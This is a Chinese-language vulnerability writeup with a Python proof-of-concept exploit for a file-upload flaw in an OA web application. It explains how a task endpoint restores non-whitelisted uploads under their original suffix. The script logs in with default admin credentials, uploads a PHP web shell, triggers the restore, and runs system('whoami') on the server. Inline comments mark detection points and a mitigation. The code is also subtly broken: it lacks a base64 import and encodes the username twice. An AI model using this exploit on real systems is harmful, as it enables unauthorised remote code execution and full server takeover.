原理
文件上传点存在一个白名单，在白名单之外的内容会被添加后缀并base64编码文件内容，编码后的文件会获得一个id，通过webmain/task/runt/qcloudCosAction.php中的qcloudCosAction类的run方法，提供对应的id即可复原后缀和内容，从而导致上传的文件被解析。
危害
攻击者可获得系统的完整访问权限。
POC & EXP
# Flat PoC script for the flaw described above: a file that fails the upload
# whitelist is stored with a '.uptemp' suffix and base64-encoded body, and the
# qcloudCos|runt task action restores it under its original suffix when given
# the upload id. The code is kept exactly as written; the comments below mark
# what each request does and where a defender can observe or break the chain.
import requests
session = requests.session()
url_pre = 'http://x.x.x.x/'  # target base URL, placeholder as given on the page
# Step 1: login endpoint (m=login, a=check). The restore step below runs in an
# authenticated session, so the task endpoint is reachable to any OA account.
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
# Step 2: upload endpoint (m=upload, a=upfile).
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
# Step 3: restore endpoint, task.php routed to qcloudCos|runt with a=run and a
# fileid. A request matching this pattern shortly after an upload is the most
# specific detection signal on this page. The literal fileid=11 here is unused:
# url3 is rebuilt below from the id returned by the upload.
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
username = 'admin' # OA username
username = encoded_username = base64.b64encode(username.encode('utf-8')).decode('utf-8')
password = 'admin' # OA password
# Repeats the encoding line above verbatim; kept as written.
username = encoded_username = base64.b64encode(username.encode('utf-8')).decode('utf-8')
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': username,
'adminpass': password,
'yanzm': ''  # presumably the captcha field, sent empty
}
r = session.post(url1, data=data1)
file = open('shell.php', 'r+') # read the shell file (opened in text mode, never closed)
r = session.post(url2, files={'file': file})
# The upload response carries the stored path (ending in '.uptemp') and an id.
# The script predicts the restored file's path by swapping '.uptemp' for '.php';
# a non-whitelisted upload landing under 'public' with a '.uptemp' name is the
# earliest observable artifact of this chain on the server side.
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']  # shadows the builtin `id`
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
# The restore request. Mitigation lives here: the run action should apply the
# same suffix whitelist as the upload path (or refuse to rewrite suffixes at
# all) and be restricted to the role that legitimately runs these tasks.
r = session.get(url3)
data2 = {
'AHtest': 'system(\'whoami\')',
}
# Final request hits the restored .php under the upload directory with a POST
# body; a POST to a script file inside an upload path is itself a detection
# candidate, independent of the parameter name used.
r = session.post(url_pre + filepath, data=data2)
print(r.text)